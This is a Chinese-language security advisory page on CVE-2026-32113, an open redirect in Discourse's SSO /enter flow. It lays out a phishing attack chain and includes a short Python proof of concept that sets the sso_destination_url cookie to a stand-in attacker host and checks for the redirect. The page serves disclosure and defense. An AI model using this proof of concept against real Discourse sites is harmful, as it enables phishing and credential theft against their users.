IPBUF安全漏洞报告
English
CVE-2026-32113 CVSS 6.1 中危

CVE-2026-32113 Discourse 开放重定向漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32113
漏洞类型
开放重定向
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Discourse

相关标签

Open RedirectDiscourseCWE-601SSOPhishing

漏洞概述

Discourse是一个开源讨论平台。在受影响版本中,StaticController的enter操作直接读取客户端的`sso_destination_url` cookie,并在未验证目标URL主机的情况下,使用`allow_other_host: true`参数执行重定向。由于cookie可被攻击者控制,该漏洞可被用于将用户重定向至恶意网站,配合钓鱼攻击窃取凭据。

技术细节

该漏洞的核心在于Discourse处理SSO(单点登录)返回流程时的逻辑缺陷。系统信任名为`sso_destination_url`的cookie值,并将其作为重定向目标。正常情况下,该cookie在合法的DiscourseConnect流程中设置,但开发者忽略了Cookie是客户端可控的这一事实。攻击者可以通过发送Set-Cookie头或利用浏览器脚本设置该cookie为任意外部URL(如http://evil.com)。当受害者访问Discourse的`/enter`路径时,后端代码读取此cookie并调用重定向函数,且未校验URL是否属于当前域名,导致跨站开放重定向。

攻击链分析

STEP 1
1. 准备阶段
攻击者识别出目标Discourse实例存在漏洞,并准备好恶意网站用于接收被重定向的受害者。
STEP 2
2. 设置Cookie
攻击者诱导受害者访问攻击者控制的页面,或通过脚本在受害者浏览器中设置`sso_destination_url` cookie,值为恶意网站的URL。
STEP 3
3. 触发重定向
受害者访问Discourse平台的特定入口(如enter动作),触发服务器读取Cookie并执行重定向逻辑。
STEP 4
4. 执行攻击
服务器将受害者重定向至攻击者预设的恶意网站,攻击者利用此过程进行钓鱼攻击或窃取用户的会话令牌。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-32113 # Demonstrates Open Redirect via cookie manipulation import requests target = "http://discourse-instance.com" malicious_site = "http://attacker.com" # The vulnerable endpoint is usually /enter url = f"{target}/enter" # Set the malicious cookie cookies = { "sso_destination_url": malicious_site } try: # Send request with the malicious cookie r = requests.get(url, cookies=cookies, allow_redirects=False) if r.status_code == 302: location = r.headers.get('Location') if malicious_site in location: print(f"[+] Vulnerability Confirmed! Redirecting to: {location}") else: print(f"[-] Redirecting to unexpected location: {location}") else: print(f"[-] Expected 302 Redirect, got {r.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

Discourse 2026.1.0 - 2026.1.2
Discourse 2026.2.0 - 2026.2.1
Discourse 2026.3.0 (pre-release versions)

防御指南

临时缓解措施
如果无法立即升级,建议通过Web应用防火墙(WAF)添加规则,检测并阻止对`sso_destination_url` cookie包含外部域名的请求,或者暂时禁用SSO Provider功能中的自动重定向跳转,直到完成补丁更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表